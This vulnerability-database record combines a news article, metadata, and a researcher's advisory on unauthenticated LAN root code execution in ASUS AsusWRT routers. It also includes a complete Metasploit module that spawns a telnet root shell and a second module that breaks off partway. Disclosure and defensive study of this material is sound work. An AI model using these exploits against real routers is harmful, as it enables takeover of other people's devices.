ASUS Patches Root Command Execution Flaws Haunting Over a Dozen Router Models

2018-01-25T18:40:03

Description

ASUS released patches for over a dozen router models on Tuesday that are each vulnerable to multiple firmware flaws that when combined give a local unauthenticated attacker the ability to execute commands as root on targeted devices. Routers models patched by ASUS are RT-AC88U, RT-AC3100, RT-AC86U, RT-AC68U and RT-AC66U. The flaw is related to ASUS firmware AsusWRT (versions before 3.0.0.4.384_10007), used in select models of the company’s router lines. “The attack is done from the LAN side the network, as opposed to the WAN side. In other words, as far as we know you cannot exploit this from the internet,” according to network security firm Beyond Security, that disclosed the vulnerabilities [earlier this week](<https://blogs.securiteam.com/index.php/archives/3589>). “This (attack) works for someone in the your LAN – even if they are on a guest network – and it may lead to remote command execution.” The two vulnerabilities are CVE-2018-6000 and CVE-2018-5999, a configuration manipulation flaw and a server authentication bypass flaw. “Due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user,” [wrote researcher Pedro Ribeiro](<https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt>) who discovered the flaw. The first flaw (CVE-2018-5999) is tied to the ASUS router firmware and takes advantage of a weakness in the AsusWRT HTTP server and the way it handles requests via “handle_request()” which allows an unauthenticated user to perform a POST request for certain actions, according to Ribeiro. “This can (and will) be combined with other vulnerabilities to achieve remote code execution,” he said. Ribeiro describes the second bug (CVE-2018-6000 ) as an unauthorized configuration change flaw tied to the router’s nonvolatile random access memory module (NVRAM). “By abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability (CVE-2018-5999) that allows an attacker to set NVRAM configuration values directly from the request,” he said. According to Ribeiro’s technical write up, the NVRAM values include the admin password. Therefore an attacker can manipulate, change or set NVRAM values such as the admin password to whatever they want. “Once that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH,” he said. SSH is shorthand for Secure Socket Shell, a network protocol that provides administrators (or attackers) a secure way to access a remote computer for remote management or manipulation. The attack scenario can be varied, such as abusing ASUS’ own service called “infosvr” that listens on UDP broadcast port 9999 on the LAN or WLAN interface, writes Ribeiro. The infosvr services has also been a target of previous attack methods ([CVE-2014-9583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>)). The vulnerabilities were disclosed earlier this week by network security firm Beyond Security and were part of the company’s SecuriTeam Secure Disclosure program. According to Beyond Security, ASUS was notified of the vulnerabilities on Nov. 22. Vulnerabilities are being patched by ASUS via automatic updates sent to affected routers, according to Beyond Security. A complete list of affected routers, according to ASUS, include: RT-AC88U 3.0.0.4.384_10007 RT-AC3100 3.0.0.4.384_10007 RT-AC86U 3.0.0.4.384_10007 RT-AC68U series 3.0.0.4.384_10007 , also include RT-AC68U/ 68R/ 68W/ AC1900/ 68U_White/ 68P/ 1900P/ 1900U RT-AC66U_B1 series 3.0.0.4.384_10007, also include AC1750_B1

{"id": "THREATPOST:318D2AC145FDD81AA284239AD4ADB10D", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "ASUS Patches Root Command Execution Flaws Haunting Over a Dozen Router Models", "description": "ASUS released patches for over a dozen router models on Tuesday that are each vulnerable to multiple firmware flaws that when combined give a local unauthenticated attacker the ability to execute commands as root on targeted devices.\n\nRouters models patched by ASUS are RT-AC88U, RT-AC3100, RT-AC86U, RT-AC68U and RT-AC66U. The flaw is related to ASUS firmware AsusWRT (versions before 3.0.0.4.384_10007), used in select models of the company\u2019s router lines.\n\n\u201cThe attack is done from the LAN side the network, as opposed to the WAN side. In other words, as far as we know you cannot exploit this from the internet,\u201d according to network security firm Beyond Security, that disclosed the vulnerabilities [earlier this week](<https://blogs.securiteam.com/index.php/archives/3589>). \u201cThis (attack) works for someone in the your LAN \u2013 even if they are on a guest network \u2013 and it may lead to remote command execution.\u201d\n\nThe two vulnerabilities are CVE-2018-6000 and CVE-2018-5999, a configuration manipulation flaw and a server authentication bypass flaw.\n\n\u201cDue to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user,\u201d [wrote researcher Pedro Ribeiro](<https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt>) who discovered the flaw.\n\nThe first flaw (CVE-2018-5999) is tied to the ASUS router firmware and takes advantage of a weakness in the AsusWRT HTTP server and the way it handles requests via \u201chandle_request()\u201d which allows an unauthenticated user to perform a POST request for certain actions, according to Ribeiro.\n\n\u201cThis can (and will) be combined with other vulnerabilities to achieve remote code execution,\u201d he said.\n\nRibeiro describes the second bug (CVE-2018-6000 ) as an unauthorized configuration change flaw tied to the router\u2019s nonvolatile random access memory module (NVRAM).\n\n\u201cBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability (CVE-2018-5999) that allows an attacker to set NVRAM configuration values directly from the request,\u201d he said.\n\nAccording to Ribeiro\u2019s technical write up, the NVRAM values include the admin password. Therefore an attacker can manipulate, change or set NVRAM values such as the admin password to whatever they want.\n\n\u201cOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH,\u201d he said. SSH is shorthand for Secure Socket Shell, a network protocol that provides administrators (or attackers) a secure way to access a remote computer for remote management or manipulation.\n\nThe attack scenario can be varied, such as abusing ASUS\u2019 own service called \u201cinfosvr\u201d that listens on UDP broadcast port 9999 on the LAN or WLAN interface, writes Ribeiro. The infosvr services has also been a target of previous attack methods ([CVE-2014-9583](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583>)).\n\nThe vulnerabilities were disclosed earlier this week by network security firm Beyond Security and were part of the company\u2019s SecuriTeam Secure Disclosure program.\n\nAccording to Beyond Security, ASUS was notified of the vulnerabilities on Nov. 22. Vulnerabilities are being patched by ASUS via automatic updates sent to affected routers, according to Beyond Security.\n\nA complete list of affected routers, according to ASUS, include:\n\nRT-AC88U 3.0.0.4.384_10007\n\nRT-AC3100 3.0.0.4.384_10007\n\nRT-AC86U 3.0.0.4.384_10007\n\nRT-AC68U series 3.0.0.4.384_10007 , also include RT-AC68U/ 68R/ 68W/ AC1900/ 68U_White/ 68P/ 1900P/ 1900U\n\nRT-AC66U_B1 series 3.0.0.4.384_10007, also include AC1750_B1\n", "published": "2018-01-25T18:40:03", "modified": "2018-01-25T18:40:03", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/asus-patches-root-command-execution-flaws-haunting-over-a-dozen-router-models/129666/", "reporter": "Tom Spring", "references": ["https://blogs.securiteam.com/index.php/archives/3589", "https://github.com/pedrib/PoC/blob/master/advisories/asuswrt-lan-rce.txt", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9583"], "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "immutableFields": [], "lastseen": "2019-01-23T05:27:51", "viewCount": 18, "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-0934"]}, {"type": "cve", "idList": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71928799B4AFACF08ED27F548C324480"]}, {"type": "nessus", "idList": ["ASUSWRT_INFOSVR_COMMAND_EXEC.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146102", "PACKETSTORM:146560", "PACKETSTORM:147284"]}, {"type": "pentestit", "idList": ["PENTESTIT:30AF1FB3AAE47288E800B5587788AF45"]}, {"type": "saint", "idList": ["SAINT:1FAFFE9723ECA2EE5DFB56A36466F828", "SAINT:46C18EA8DC44A814054B124849F1C9B9", "SAINT:4A5BD29FAF80B56E6590F3C648A7268F", "SAINT:5069DD588A8DDA678A16F6B17DE4B1F1", "SAINT:75674DE142EE6A5182F2C3AEAC3FE313", "SAINT:79379382D62E420B234A449DAE36D8AE", "SAINT:9EC44034675C3CB4D052F0A57AE94026"]}, {"type": "seebug", "idList": ["SSV:89236"]}, {"type": "zdt", "idList": ["1337DAY-ID-29883", "1337DAY-ID-30222"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2016-0934"]}, {"type": "cve", "idList": ["CVE-2014-9583"]}, {"type": "exploitdb", "idList": ["EDB-ID:43881"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:71928799B4AFACF08ED27F548C324480"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/HTTP/ASUSWRT_LAN_RCE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146560"]}, {"type": "saint", "idList": ["SAINT:1FAFFE9723ECA2EE5DFB56A36466F828"]}, {"type": "zdt", "idList": ["1337DAY-ID-29883"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2014-9583", "epss": "0.965460000", "percentile": "0.992950000", "modified": "2023-03-15"}, {"cve": "CVE-2018-5999", "epss": "0.791760000", "percentile": "0.977030000", "modified": "2023-03-15"}, {"cve": "CVE-2018-6000", "epss": "0.684230000", "percentile": "0.973710000", "modified": "2023-03-15"}], "vulnersScore": 0.7}, "_state": {"dependencies": 1678917980, "score": 1683995507, "epss": 1678938645}, "_internal": {"score_hash": "9cae8f62d5402fbe41e971967be63ce8"}}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:05", "description": "\nAsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "cvss3": {}, "published": "2018-01-22T00:00:00", "type": "exploitpack", "title": "AsusWRT Router 3.0.0.4.380.7743 - LAN Remote Code Execution", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-22T00:00:00", "id": "EXPLOITPACK:71928799B4AFACF08ED27F548C324480", "href": "", "sourceData": ">> Unauthenticated LAN remote code execution in AsusWRT\n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security\n=================================================================================\nDisclosure: 22/01/2018 / Last updated: 25/01/2018\n\n\n>> Background and summary\nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers.\nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers.\n\nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user.\n\nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory).\n\n\n>> Technical details:\n#1\nVulnerability: HTTP server authentication bypass\nCVE-2018-5999\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions.\nIn AsusWRT_source/router/httpd/httpd.c:\n\nhandle_request(void)\n{\n...\n\thandler->auth(auth_userid, auth_passwd, auth_realm);\n\tauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp);\n\n\tif (auth_result != 0) <--- auth fails\n\t{\n\t\tif(strcasecmp(method, \"post\") == 0){\n\t\t\tif (handler->input) {\n\t\t\t\thandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed\n\t\t\t}\n\t\t\tsend_login_page(fromapp, auth_result, NULL, NULL, 0);\n\t\t}\n\t\t//if(!fromapp) http_logout(login_ip_tmp, cookies);\n\t\treturn;\n\t}\n...\n}\n\nThis can (and will) be combined with other vulnerabilities to achieve remote code execution.\n\n\n#2\nVulnerability: Unauthorised configuration change (NVRAM value setting)\nCVE-2018-6000\nAttack Vector: Remote\nConstraints: None; exploitable by an unauthenticated attacker\nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007\n\nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request.\nIn AsusWRT_source/router/httpd/web.c:\n\ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary)\n{\n...\n\tif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) {\n\t\tif(strstr(post_buf, \"name=\\\"file\\\"\"))\n\t\t\tbreak;\n\t\telse if(strstr(post_buf, \"name=\\\"\")) {\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\toffset = strlen(post_buf);\n\t\t\tfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream);\n\t\t\tlen -= strlen(post_buf) - offset;\n\t\t\tp = post_buf;\n\t\t\tname = strstr(p, \"\\\"\") + 1;\n\t\t\tp = strstr(name, \"\\\"\");\n\t\t\tstrcpy(p++, \"\\0\");\n\t\t\tvalue = strstr(p, \"\\r\\n\\r\\n\") + 4;\n\t\t\tp = strstr(value, \"\\r\");\n\t\t\tstrcpy(p, \"\\0\");\n\t\t\t//printf(\"%s=%s\\n\", name, value);\n\t\t\tnvram_set(name, value);\n\t\t}\n\t}\n...\n}\n\nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker.\n\nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH.\n\nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999.\nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website).\n\nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords.\n\n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015).\n\nPacket structure (from AsusWRT_source/router/shared/iboxcom.h):\n- Header\n typedef struct iboxPKTEx\n {\n BYTE\t\tServiceID;\n BYTE\t\tPacketType;\n WORD\t\tOpCode;\n DWORD \t\tInfo; // Or Transaction ID\n BYTE\t\tMacAddress[6];\n BYTE\t\tPassword[32]; //NULL terminated string, string length:1~31, cannot be NULL string\n } ibox_comm_pkt_hdr_ex;\n\n- Body\n typedef struct iboxPKTCmd\n {\n WORD\t\tlen;\n BYTE\t\tcmd[420];\t\t<--- command goes here\n } PKT_SYSCMD;\t\t// total 422 bytes\n\nA Metasploit module exploiting this vulnerability has been released [3].\n\n\n>> Fix:\nUpgrade to AsusWRT v3.0.0.4.384.10007 or above.\nSee [4] for the very few details and new firmware released by Asus.\n\n\n>> References:\n[1] https://blogs.securiteam.com/index.php/archives/3589\n[2] https://github.com/jduck/asus-cmd\n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb\n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/\n\n================\nAgile Information Security Limited\nhttp://www.agileinfosec.co.uk/\n>> Enabling secure digital business >>", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2018-01-26T08:23:18", "description": "", "cvss3": {}, "published": "2018-01-26T00:00:00", "type": "packetstorm", "title": "AsusWRT Router Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-01-26T00:00:00", "id": "PACKETSTORM:146102", "href": "https://packetstormsecurity.com/files/146102/AsusWRT-Router-Remote-Code-Execution.html", "sourceData": "`>> Unauthenticated LAN remote code execution in AsusWRT \n>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security \n================================================================================= \nDisclosure: 22/01/2018 / Last updated: 25/01/2018 \n \n \n>> Background and summary \nAsusWRT is the operating system used in mid range and high end Asus routers. It is based on Linux, but with a sleek web UI and a slimmed down profile suitable for running on resource constrained routers. \nThankfully ASUS is a responsible company, and not only they publish the full source code as required by the GPL, but they also give users full root access to their router via SSH. Overall the security of their operating system is pretty good, especially when compared to other router manufacturers. \n \nHowever due to a number of coding errors, it is possible for an unauthenticated attacker in the LAN to achieve remote code execution in the router as the root user. \n \nA special thanks to Beyond Security SecuriTeam Secure Disclosure (SSD) programme for disclosing these vulnerabilities to the manufacturer, speeding the resolution of the issues discovered (see [1] for their advisory). \n \n \n>> Technical details: \n#1 \nVulnerability: HTTP server authentication bypass \nCVE-2018-5999 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nThe AsusWRT HTTP server has a flaw in handle_request() that allows an unauthenticated user to perform a POST request for certain actions. \nIn AsusWRT_source/router/httpd/httpd.c: \n \nhandle_request(void) \n{ \n... \nhandler->auth(auth_userid, auth_passwd, auth_realm); \nauth_result = auth_check(auth_realm, authorization, url, file, cookies, fromapp); \n \nif (auth_result != 0) <--- auth fails \n{ \nif(strcasecmp(method, \"post\") == 0){ \nif (handler->input) { \nhandler->input(file, conn_fp, cl, boundary); <--- but POST request is still processed \n} \nsend_login_page(fromapp, auth_result, NULL, NULL, 0); \n} \n//if(!fromapp) http_logout(login_ip_tmp, cookies); \nreturn; \n} \n... \n} \n \nThis can (and will) be combined with other vulnerabilities to achieve remote code execution. \n \n \n#2 \nVulnerability: Unauthorised configuration change (NVRAM value setting) \nCVE-2018-6000 \nAttack Vector: Remote \nConstraints: None; exploitable by an unauthenticated attacker \nAffected versions: confirmed on v3.0.0.4.380.7743; possibly affects every version before v3.0.0.4.384.10007 \n \nBy abusing vulnerability #1 and POSTing to vpnupload.cgi, we can invoke do_vpnupload_post() in the HTTP server code, which has a vulnerability that allows an attacker to set NVRAM configuration values directly from the request. \nIn AsusWRT_source/router/httpd/web.c: \n \ndo_vpnupload_post(char *url, FILE *stream, int len, char *boundary) \n{ \n... \nif (!strncasecmp(post_buf, \"Content-Disposition:\", 20)) { \nif(strstr(post_buf, \"name=\\\"file\\\"\")) \nbreak; \nelse if(strstr(post_buf, \"name=\\\"\")) { \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \noffset = strlen(post_buf); \nfgets(post_buf+offset, MIN(len + 1, sizeof(post_buf)-offset), stream); \nlen -= strlen(post_buf) - offset; \np = post_buf; \nname = strstr(p, \"\\\"\") + 1; \np = strstr(name, \"\\\"\"); \nstrcpy(p++, \"\\0\"); \nvalue = strstr(p, \"\\r\\n\\r\\n\") + 4; \np = strstr(value, \"\\r\"); \nstrcpy(p, \"\\0\"); \n//printf(\"%s=%s\\n\", name, value); \nnvram_set(name, value); \n} \n} \n... \n} \n \nThese NVRAM values contain very important configuration variables, such as the admin password, which can be set in this way by an authenticated or unauthenticated attacker. \n \nOnce that is done, code execution is easily achieved. One option is to login to the web interface with the new password, enable SSH, reboot the router and login via SSH. \n \nA more elegant option is to abuse infosvr, which is a UDP daemon running on port 9999. \nThe daemon has a special mode where it executes a command received in a packet as the root user. This special mode is only enabled if ateCommand_flag is set to 1, which most likely only happens during factory testing or QA (it was not enabled by default in the firmware distributed by Asus in their website). \n \nHowever we can set ateCommand_flag to 1 using the VPN configuration upload technique described above and then send a PKT_SYSCMD to infosvr. The daemon will read a command from the packet and execute it as root, achieving our command execution cleanly - without changing any passwords. \n \n(Note: infosvr used to allow unauthenticated command execution without the ateCommand_flag being set, which led to Joshua Drake's (jduck) discovery of CVE-2014-9583, see [2]; this was fixed by Asus in early 2015). \n \nPacket structure (from AsusWRT_source/router/shared/iboxcom.h): \n- Header \ntypedef struct iboxPKTEx \n{ \nBYTE ServiceID; \nBYTE PacketType; \nWORD OpCode; \nDWORD Info; // Or Transaction ID \nBYTE MacAddress[6]; \nBYTE Password[32]; //NULL terminated string, string length:1~31, cannot be NULL string \n} ibox_comm_pkt_hdr_ex; \n \n- Body \ntypedef struct iboxPKTCmd \n{ \nWORD len; \nBYTE cmd[420]; <--- command goes here \n} PKT_SYSCMD; // total 422 bytes \n \nA Metasploit module exploiting this vulnerability has been released [3]. \n \n \n>> Fix: \nUpgrade to AsusWRT v3.0.0.4.384.10007 or above. \nSee [4] for the very few details and new firmware released by Asus. \n \n \n>> References: \n[1] https://blogs.securiteam.com/index.php/archives/3589 \n[2] https://github.com/jduck/asus-cmd \n[3] https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/asuswrt_lan_rce.rb \n[4] https://www.asus.com/Static_WebPage/ASUS-Product-Security-Advisory/ \n \n================ \nAgile Information Security Limited \nhttp://www.agileinfosec.co.uk/ \n>> Enabling secure digital business >> \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146102/asuswrt3-exec.txt"}, {"lastseen": "2018-02-24T00:58:03", "description": "", "cvss3": {}, "published": "2018-02-23T00:00:00", "type": "packetstorm", "title": "AsusWRT LAN Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-02-23T00:00:00", "id": "PACKETSTORM:146560", "href": "https://packetstormsecurity.com/files/146560/AsusWRT-LAN-Unauthenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'AsusWRT LAN Unauthenticated Remote Code Execution', \n'Description' => %q{ \nThe HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to \nperform a POST in certain cases. This can be combined with another vulnerability in \nthe VPN configuration upload routine that sets NVRAM configuration variables directly \nfrom the POST request to enable a special command mode. \nThis command mode can then be abused by sending a UDP packet to infosvr, which is running \non port UDP 9999 to directly execute commands as root. \nThis exploit leverages that to start telnetd in a random port, and then connects to it. \nIt has been tested with the RT-AC68U running AsusWRT Version 3.0.0.4.380.7743. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib@gmail.com>' # Vulnerability discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['URL', 'https://blogs.securiteam.com/index.php/archives/3589'], \n['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/asuswrt-lan-rce.txt'], \n['URL', 'http://seclists.org/fulldisclosure/2018/Jan/78'], \n['CVE', '2018-5999'], \n['CVE', '2018-6000'] \n], \n'Targets' => \n[ \n[ 'AsusWRT < v3.0.0.4.384.10007', \n{ \n'Payload' => \n{ \n'Compat' => { \n'PayloadType' => 'cmd_interact', \n'ConnectionType' => 'find', \n}, \n}, \n} \n], \n], \n'Privileged' => true, \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, \n'DisclosureDate' => 'Jan 22 2018', \n'DefaultTarget' => 0)) \nregister_options( \n[ \nOpt::RPORT(9999) \n]) \n \nregister_advanced_options( \n[ \nOptInt.new('ASUSWRTPORT', [true, 'AsusWRT HTTP portal port', 80]) \n]) \nend \n \ndef exploit \n# first we set the ateCommand_flag variable to 1 to allow PKT_SYSCMD \n# this attack can also be used to overwrite the web interface password and achieve RCE by enabling SSH and rebooting! \npost_data = Rex::MIME::Message.new \npost_data.add_part('1', content_type = nil, transfer_encoding = nil, content_disposition = \"form-data; name=\\\"ateCommand_flag\\\"\") \n \ndata = post_data.to_s \n \nres = send_request_cgi({ \n'uri' => \"/vpnupload.cgi\", \n'method' => 'POST', \n'rport' => datastore['ASUSWRTPORT'], \n'data' => data, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n}) \n \nif res and res.code == 200 \nprint_good(\"#{peer} - Successfully set the ateCommand_flag variable.\") \nelse \nfail_with(Failure::Unknown, \"#{peer} - Failed to set ateCommand_flag variable.\") \nend \n \n \n# ... but we like to do it more cleanly, so let's send the PKT_SYSCMD as described in the comments above. \ninfo_pdu_size = 512 # expected packet size, not sure what the extra bytes are \nr = Random.new \n \nibox_comm_pkt_hdr_ex = \n[0x0c].pack('C*') + # NET_SERVICE_ID_IBOX_INFO 0xC \n[0x15].pack('C*') + # NET_PACKET_TYPE_CMD 0x15 \n[0x33,0x00].pack('C*') + # NET_CMD_ID_MANU_CMD 0x33 \nr.bytes(4) + # Info, don't know what this is \nr.bytes(6) + # MAC address \nr.bytes(32) # Password \n \ntelnet_port = rand((2**16)-1024)+1024 \ncmd = \"/usr/sbin/telnetd -l /bin/sh -p #{telnet_port}\" + [0x00].pack('C*') \npkt_syscmd = \n[cmd.length,0x00].pack('C*') + # cmd length \ncmd # our command \n \npkt_final = ibox_comm_pkt_hdr_ex + pkt_syscmd + r.bytes(info_pdu_size - (ibox_comm_pkt_hdr_ex + pkt_syscmd).length) \n \nconnect_udp \nudp_sock.put(pkt_final) # we could process the response, but we don't care \ndisconnect_udp \n \nprint_status(\"#{peer} - Packet sent, let's sleep 10 seconds and try to connect to the router on port #{telnet_port}\") \nsleep(10) \n \nbegin \nctx = { 'Msf' => framework, 'MsfExploit' => self } \nsock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port, 'Context' => ctx, 'Timeout' => 10 }) \nif not sock.nil? \nprint_good(\"#{peer} - Success, shell incoming!\") \nreturn handler(sock) \nend \nrescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e \nsock.close if sock \nend \n \nprint_bad(\"#{peer} - Well that didn't work... try again?\") \nend \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146560/asuswrt_lan_rce.rb.txt"}, {"lastseen": "2018-04-22T01:28:46", "description": "", "cvss3": {}, "published": "2018-04-21T00:00:00", "type": "packetstorm", "title": "ASUS infosvr Authentication Bypass Command Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-9583"], "modified": "2018-04-21T00:00:00", "id": "PACKETSTORM:147284", "href": "https://packetstormsecurity.com/files/147284/ASUS-infosvr-Authentication-Bypass-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::Udp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ASUS infosvr Auth Bypass Command Execution', \n'Description' => %q{ \nThis module exploits an authentication bypass vulnerability in the \ninfosvr service running on UDP port 9999 on various ASUS routers to \nexecute arbitrary commands as root. \n \nThis module launches the BusyBox Telnet daemon on the port specified \nin the TelnetPort option to gain an interactive remote shell. \n \nThis module was tested successfully on an ASUS RT-N12E with firmware \nversion 2.0.0.35. \n \nNumerous ASUS models are reportedly affected, but untested. \n}, \n'Author' => \n[ \n'Friedrich Postelstorfer', # Initial public disclosure and Python exploit \n'jduck', # Independent discovery and C exploit \n'Brendan Coles <bcoles[at]gmail.com>' # Metasploit \n], \n'License' => MSF_LICENSE, \n'Platform' => 'unix', \n'References' => \n[ \n['CVE', '2014-9583'], \n['EDB', '35688'], \n['URL', 'https://github.com/jduck/asus-cmd'] \n], \n'DisclosureDate' => 'Jan 4 2015', \n'Privileged' => true, \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Compat' => { \n'PayloadType' => 'cmd_interact', \n'ConnectionType' => 'find' \n} \n}, \n'Targets' => [['Automatic', {}]], \n'DefaultTarget' => 0)) \nregister_options [ \nOpt::RPORT(9999), \nOptInt.new('TelnetPort', [true, 'The port for Telnetd to bind', 4444]), \nOptInt.new('TelnetTimeout', [true, 'The number of seconds to wait for connection to telnet', 10]), \nOptInt.new('TelnetBannerTimeout', [true, 'The number of seconds to wait for the telnet banner', 25]) \n] \nregister_advanced_options [ \n# If the session is killed (CTRL+C) rather than exiting cleanly, \n# the telnet port remains open, but is unresponsive, and prevents \n# re-exploitation until the device is rebooted. \nOptString.new('CommandShellCleanupCommand', [true, 'A command to run before the session is closed', 'exit']) \n] \nend \n \ndef telnet_timeout \n(datastore['TelnetTimeout'] || 10) \nend \n \ndef telnet_port \ndatastore['TelnetPort'] \nend \n \ndef request(cmd) \npkt = '' \n# ServiceID [byte] ; NET_SERVICE_ID_IBOX_INFO \npkt << 